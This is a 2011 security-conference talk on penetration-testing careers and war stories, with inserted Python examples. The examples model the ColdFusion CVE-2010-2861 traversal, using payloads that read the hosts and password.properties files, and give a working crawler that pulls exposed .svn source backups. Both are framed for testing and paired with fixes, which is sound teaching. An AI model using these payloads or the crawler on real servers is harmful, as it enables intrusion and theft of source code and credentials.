Breaking, Entering and Pentesting

BSidesLondon 20th April 2011 - Steve Lord (@stevelord)
----------------------------------------------------------------
The majority of penetration testing teams have staff falling into three of four categories: Nessus Monkeys, Experts-in-Training and Jaded Cynics. This is a talk about improving penetration testing skills to get to the rare fourth Jedi Master level, normally occupied by less than 1% of the team, where nothing is impossible. The talk will be backed up by video footage from actual penetration tests as well as live demos and a Q&A session.
---- for more about Steve
http://www.mandalorian.com

Speaker notes (one note per slide):
  • I'm sure many of you will have come across this before; when I heard it, I interpreted it as a sign of interesting things to come.
  • How many pentesters does it take to change a light bulb? It's the customer's job to change it; we just break stuff. In theory, the role of the pentester is to assist the information assurance process by providing a technical assessment of actual threats. In practice.
  • The system was connected to the Internet, as well as to various HMG networks. This was part of a mandated annual IT Health Check. Can you spot what's wrong with this picture?
  • Said to me during unlawful detention, after an 'impossible' route back to the customer network from an Indian offshorer was identified, and after we'd found all manner of hideous stuff on the network, proving that while they may have a duty, it wasn't being exercised.
  • I made this all up, but run with me
  • Wandering off-scope. See also, “Hey guys, I cracked this WEP network last night.” Not choosing company wisely: “But those d00dz in #defacers really know their stuff.” Thinking it's someone else's job to teach you: “I didn't know that'd down the server.”
  • Understands an RFC
  • Experience increases. Realisation of inability to effect change. Depression, alcoholism, drugs, divorce, etc. As they transcend: able to take TigerScheme QSTM; may pass first time; should pass second time.
  • I have a lot of respect for CLAS consultants, I was one for a year. Sadly this guy wasn't one of them. Yes he talked a bit like Hyperchicken too.
  • The majority of team leaders fall into this. Death by PCI/DII.
  • Putting up with management, followed by doing it
  • “But why would you want to leave?” There are many reasons, but pentesting is a strange job and, as anywhere else, if they don't feel valued or that they're achieving, they'll move on. “You'll have to go into management to grow.” Not only will you lose one of your best technical resources, but you'll gain someone probably unprepared for the horrors of management interaction. “How do you feel about writing an RMADS?” Up until this point, the Jaded Cynic may have heard of IS1 but is unlikely to fully understand the fundamentals that drive the IAMM and SPF. Policy is mostly boring for pentesters.
  • We found something on a pentest. Got all excited, wanted to call it Cross-Site Squirting; then marketing looked up 'squirting' on Google with SafeSearch off. Marketing doesn't click on links any more. Which was just as well, as we found out that it was an obscure issue, but documented on the interwebs. So we wrote a tool instead to automate it.
  • Subversion uses WebDAV to handle checkins and checkouts. Without WebDAV you can't just rock up and check out, which sucks, because sometimes even with WebDAV you can't check out, as someone was clever with the permissions.
  • Subversion uses the .svn directory structure. Beneath this is an entries file for each subdirectory. The entries file lists the file and directory names that exist beneath the current directory root. Subversion creates a backup of each file, with .svn-base at the end of the name.
  • Where this gets interesting is this: most HTTP servers treat .svn-base as an unknown extension, so serve it as text/plain or similar. This means that if you can parse the entries files and directory structures, you can download all the .svn-base files, and then you have a full backup of the svn tree.
  • Hidden admin interface. Debug=1 variable. Various RFI bugs.
  • Assimilates new information at lightning speed. Makes their own tools. Does or does not – there is no try. Commercially aware. Balances value and coverage. At least moderately socially balanced. Attempts to understand the customer threat landscape before testing. Goes beyond attack trees. Builds attack avenues. Scenario-based testing.
  • Alright, one last war story
  • Went to a call centre. Found a PC. Logged onto the PC. Hacked Siebel using MS Access and ODBC. Forgot to link tables – FAIL. Access tries to download the full Siebel database across the WAN link.
  • Breaking, Entering and Pentesting

Slide: Breaking, Entering and Pentesting - Steve Lord
Slide: The Things Customers Say (To me, at least...)
  • From a leading SI: “That's not a risk. It's internal.”
Slide: Who is this guy? And what does he know?
  • Steve Lord
    • Founder, Mandalorian
    • TigerScheme SST and TP member
    • Co-Founder, 44Con - http://www.44con.com/
  • 12 Year Pentesting Veteran (the slide has “Victim” struck through)
    • Big gov, small gov, financials, defence, NGOs, small countries, small continents
Slide: What Does A Pentester Do? (Other than drinking, natch)
Slide: What Does A Pentester Do? (In practice)
Slide: What Does A Pentester Do? (Don't believe me?)
  • 3 months ago we tested a government system
  • During the test we found a ColdFusion system
  • Tried requesting the following:
    • /CFIDE/administrator/settings/mappings.cfm?locale=..\..\..\..\..\..\..\..\windows\system32\drivers\etc\hosts%00en
Slide: What Does A Pentester Do? (Don't believe me?)
Slide: Did You Spot The Gorilla? (Really?)
  • Shall we try again?
Slide: What Does A Pentester Do? (Don't believe me?)
Slide: What Does A Pentester Do? (Grading time)
  • It was vulnerable to CVE-2010-2861
    • 1 point
Slide: What Does A Pentester Do? (Grading time)
  • The /CFIDE/administrator/ path was accessible from the Internet
    • 1 point
Slide: What Does A Pentester Do? (Grading time)
  • That Adobe acquired Macromedia in 2005, and as such this thing's been open for how long since an upgrade?
    • 2 points – report due by end of talk pls
Slide: What Does A Pentester Do? (Keep it going harder)
  • Can we get admin passwords?
    • ..\..\lib\password.properties
  • Add Scheduled Task
  • Leading to...
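The two requests on the slides above (the hosts file, then password.properties) work because a user-supplied locale value ends up in a file path, with traversal sequences to leave the intended directory and a %00 to cut off whatever the application appends. The following is an added example that models that bug class in Python beside a hardened resolver; it is not ColdFusion's code, and the install directory, the ".properties" suffix and the "value must end in a known locale code" check are assumptions chosen to show why the payload ends in %00en rather than in %00 alone. The path separators in the slide's payload are assumed to be backslashes, which did not survive extraction.

```python
"""
Model of the bug class behind CVE-2010-2861: a locale parameter used to
build a file path, exploited with directory traversal plus %00 truncation.
Added example, not Adobe's code. LOCALE_DIR, ALLOWED_LOCALES, the
".properties" suffix and the ends-with-locale check are assumptions.
"""
import posixpath
from urllib.parse import unquote

# Assumed install layout: where the application keeps its locale files.
LOCALE_DIR = "/opt/coldfusion/wwwroot/CFIDE/administrator/locale"
ALLOWED_LOCALES = {"en", "de", "fr", "ja"}

# The slide's payload, separators assumed to be backslashes. Eight "..\"
# steps climb out of any plausible install directory; normpath clamps
# at the filesystem root, just as the OS does.
HOSTS_PAYLOAD = (
    "..\\..\\..\\..\\..\\..\\..\\..\\windows\\system32\\drivers\\etc\\hosts%00en"
)


def resolve_locale_vulnerable(locale):
    """Vulnerable resolver. It only checks that the value ends in a known
    locale code, then builds a path and hands it to a NUL-tolerant native
    file API (modelled by the truncation below). Returns the canonical
    path that would actually be opened."""
    decoded = unquote(locale)                          # "%00" -> "\x00"
    if not any(decoded.endswith(code) for code in ALLOWED_LOCALES):
        raise ValueError("unknown locale")             # "...hosts\x00en" passes
    # Windows accepts both separators, so the model normalises to "/".
    raw = LOCALE_DIR + "/" + decoded.replace("\\", "/") + ".properties"
    # A C-level open() stops at the first NUL: the ".properties" suffix and
    # the trailing "en" vanish, leaving only the attacker's file.
    truncated = raw.split("\x00", 1)[0]
    return posixpath.normpath(truncated)


def resolve_locale_safe(locale):
    """Hardened resolver: reject NUL bytes, allow-list the value, and as
    defence in depth confirm the canonical path is still under LOCALE_DIR.
    Returns the path, or None when the input is rejected."""
    decoded = unquote(locale)
    if "\x00" in decoded or decoded not in ALLOWED_LOCALES:
        return None
    candidate = posixpath.normpath(
        posixpath.join(LOCALE_DIR, decoded + ".properties")
    )
    if posixpath.commonpath([LOCALE_DIR, candidate]) != LOCALE_DIR:
        return None
    return candidate


if __name__ == "__main__":
    print("vulnerable:", resolve_locale_vulnerable(HOSTS_PAYLOAD))
    print("safe      :", resolve_locale_safe(HOSTS_PAYLOAD))
    print("safe, en  :", resolve_locale_safe("en"))
```

The allow-list is the fix; the commonpath check is there so that a future change to how the value is used cannot quietly reintroduce traversal. From the tester's side, the check on a live target is simply whether the response body carries hosts-file or password.properties content, and whether /CFIDE/administrator/ answers from the Internet at all.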
Slide: The Things Customers Say (To me, at least...)
  • From another leading SI: “We have a duty of care to protect customer data”
Slide: Classes of Pentester (You mean there's more than one?)
  • Pentesters can be grouped into several classes based on:
    • Experience
    • Attitude
    • Motivation
    • Ability
Slide: Classes of Pentester: The Nessus Monkey
  • Often fresh out of Uni
  • Runs tools
  • Follows methodology
  • Good at filling in checklists
  • Can do an OPTIONS request in a single bound
  • Might even know how to drive Ubuntu
Slide: Classes of Pentester: The Nessus Monkey
Slide: Classes of Pentester: Common Nessus Monkey Mistakes
  • Wandering off-scope
  • Not choosing company wisely
  • Thinking it's someone else's job to teach you
Slide: Classes of Pentester: Even Nessus Monkeys get root
  • Nessus reports Tomcat HTML interface
  • Nessus Monkey fires up Metasploit
  • Nessus Monkey owns system
  • Nessus Monkey happy
  • Nessus Monkey graduates
Slide: Classes of Pentester: Experts in Training
  • Has written a tool
  • Knows a programming language
  • Can use a Linux command line
  • Has read an RFC
  • Hungry for root, hungry to learn
Slide: Classes of Pentester: Experts in Training
Slide: Classes of Pentester: Experts in Training Observations
  • As skills increase
    • Awareness of problem space (usually) increases
    • Experience increases
    • QSTM/CTM ready
Slide: War Stories (With pictures)
  • SQL Injection on a box
  • Nessus Monkey runs sqlmap
  • Team Lead rolls his own
  • Sometimes sqlmap isn't quick enough
    • Which leads to...
Slide: War Stories (With pictures)
Slide: The Things Customers Say (To me, at least...)
  • From a CLAS consultant: “Let's call this what it is, an unjustified unlimited hacking exercise”
Slide: Classes of Pentester: Jaded Cynic
  • Hit the tech ceiling
  • Changes the dates on old reports and submits on retests
  • It's just a saga now
Slide: Classes of Pentester: Jaded Cynic
Slide: Classes of Pentester: Jaded Cynic - Key Factors in Cool Stuff Time
  • Certifications
    • TigerScheme SST every 3 years
      • ~20% first-time pass rate, 2 day exam
  • Management
  • Marriage
  • Kids
Slide: Classes of Pentester: Jaded Cynic - Mistakes Employers Make
  • “But why would you want to leave?”
  • “You'll have to go into management to grow”
  • “How do you feel about writing an RMADS?”
Slide: But Don't Be Sad (Well, not just yet...)
  • Obligatory tool release moment pending, journalists please stand by, the marketing team have been very busy.
Slide: War Stories: The Jaded Cynic and the Web App
  • PHP-based Web app
    • .svn/Entries found by Nikto
  • Has a poke round .svn-land
  • Which leads to...
Slide: War Stories: The Jaded Cynic and the Web App
Slide: War Stories: The Jaded Cynic and the Web App
Slide: War Stories: The Jaded Cynic and the Web App
  • Subverted
    • Generates a list of source backup files for wget
    • http://www.mandalorian.com/resources/releases/
  • Found some goodies :)
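The speaker note on .svn directories (entries files listing names, a .svn-base copy of every file, and web servers that serve .svn-base as text) and the Subverted slide above describe the same walk: read .svn/entries, recurse into subdirectories, and collect the URLs of the pristine copies. The following is an added example of that walk in Python; it is not the Subverted tool itself. It parses the text-format entries file that Subversion 1.4 to 1.6 wrote (the format the 2011 talk would have met), and the target host and the small site it crawls are constructed so the script runs offline; swap fake_fetch for a real HTTP client to use it on a scoped target.

```python
"""
Walk a Subversion working copy that was deployed as a web root (pre-1.7
layout: .svn/entries plus .svn/text-base/<file>.svn-base) and list, then
fetch, the backup copies. Added example, not Steve Lord's Subverted tool.
TARGET and SITE are constructed so the script runs offline.
"""
from urllib.parse import quote

TARGET = "http://target.example"      # hypothetical host


def parse_entries(text):
    """Parse a text-format .svn/entries file (Subversion 1.4 to 1.6).
    Line 1 is the format number; entries follow, each terminated by a form
    feed plus newline, with one field per line: name first, then kind
    ('file' or 'dir'). The first entry has an empty name and describes the
    directory itself, so it is skipped. Returns [(name, kind), ...]."""
    header, _, body = text.partition("\n")
    if not header.strip().isdigit():
        raise ValueError("not a text-format entries file (1.7+ keeps .svn/wc.db instead)")
    items = []
    for entry in body.split("\x0c\n"):
        fields = entry.split("\n")
        if len(fields) < 2 or fields[0] == "" or fields[1] not in ("file", "dir"):
            continue
        items.append((fields[0], fields[1]))
    return items


def svn_base_urls(base_url, fetch):
    """Depth-first walk from base_url's .svn/entries into every listed
    subdirectory; returns the URLs of the .svn-base copies of every file.
    fetch(url) -> (status, content_type, body) is supplied by the caller."""
    todo = [base_url.rstrip("/") + "/"]
    seen, found = set(), []
    while todo:
        dir_url = todo.pop()
        if dir_url in seen:
            continue
        seen.add(dir_url)
        status, _, body = fetch(dir_url + ".svn/entries")
        if status != 200:
            continue
        try:
            items = parse_entries(body)
        except ValueError:
            continue
        for name, kind in items:
            if kind == "dir":
                todo.append(dir_url + quote(name) + "/")
            else:
                found.append(dir_url + ".svn/text-base/" + quote(name) + ".svn-base")
    return found


def download_sources(urls, fetch):
    """Fetch each .svn-base URL and keep the ones the server returned as
    text: the unknown-extension-served-as-text/plain behaviour the talk
    relies on. Returns {url: source}."""
    sources = {}
    for url in urls:
        status, ctype, body = fetch(url)
        if status == 200 and ctype.startswith("text/"):
            sources[url] = body
    return sources


# ---- constructed sample site (not a real target) --------------------------

def make_entries(items):
    """Build a format-10 entries file for the sample. Real entries carry
    around thirty fields per item; only name and kind matter here."""
    chunks = ["\ndir\n"] + [f"{name}\n{kind}\n" for name, kind in items]
    return "10\n" + "\x0c\n".join(chunks) + "\x0c\n"


SITE = {
    "/.svn/entries": make_entries([("index.php", "file"), ("lib", "dir"), ("config.php", "file")]),
    "/lib/.svn/entries": make_entries([("db.php", "file")]),
    "/.svn/text-base/index.php.svn-base": "<?php require 'config.php'; ?>",
    "/.svn/text-base/config.php.svn-base": "<?php $db_pass = 'constructed-secret'; ?>",
    "/lib/.svn/text-base/db.php.svn-base": "<?php function db() { return null; } ?>",
}


def fake_fetch(url):
    """Stand-in for an HTTP GET against SITE. Serves entries and .svn-base
    files as text/plain; the live .php URLs are absent because a real
    server would execute them rather than show their source."""
    path = url[len(TARGET):]
    if path not in SITE:
        return 404, None, None
    return 200, "text/plain", SITE[path]


if __name__ == "__main__":
    leaked = download_sources(svn_base_urls(TARGET, fake_fetch), fake_fetch)
    for url, src in leaked.items():
        print(url, "->", src)
```

Two caveats for anyone using this on a real engagement. Subversion 1.7 and later replaced the per-directory entries files with a single .svn/wc.db SQLite database and moved the pristine copies to .svn/pristine/, so the format check above fails on such a tree even though the exposure (the whole working copy served from the web root) is the same. On the defensive side, the fix is to deploy an export rather than a checkout, and to deny any path containing .svn at the web server, for example an Apache `<DirectoryMatch "/\.svn">` block with `Require all denied`, so that neither the entries files nor the .svn-base copies are reachable at all.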
Slide: The Things Customers Say (To me, at least...)
  • From an IT Service Provider: “If any of our systems go down, we're throwing you off-site”
Slide: The Things Customers Say (To me, at least...)
Slide: There is another class of pentester...
Slide: Classes of Pentester: Jedi Master
Slide: Classes of Pentester: Jedi Master
Slide: Classes of Pentester: Jedi Masters – specific qualities
  • Is Relentless
  • Has blood
  • Commercially aware
  • Thinks beyond attack trees
Slide: Classes of Pentester: Jedi Master
Slide: War Stories: Jedi Master Grade
  • Sorry I don't have mitochlorians
    • But I'm trying to be better
Slide: The Things Customers Say (To me, at least...)
  • From *yet* another leading SI: “A particularly vigilant DBA spotted your tests”
Slide: Tonight at DC4420 (A taste of things to come)
Slide: Thanks for having me (It keeps me off the streets)
  • This presentation brought to you by Caravan Palace, Parov Stelar, Daft Punk and Beer. Hmmm... Beer.
  • My next talk will be at DC4420 this evening, about strategies for evading automated detection and manual analysis. Hope to see you there!
  • CC-NC-SA ©2011 Mandalorian.
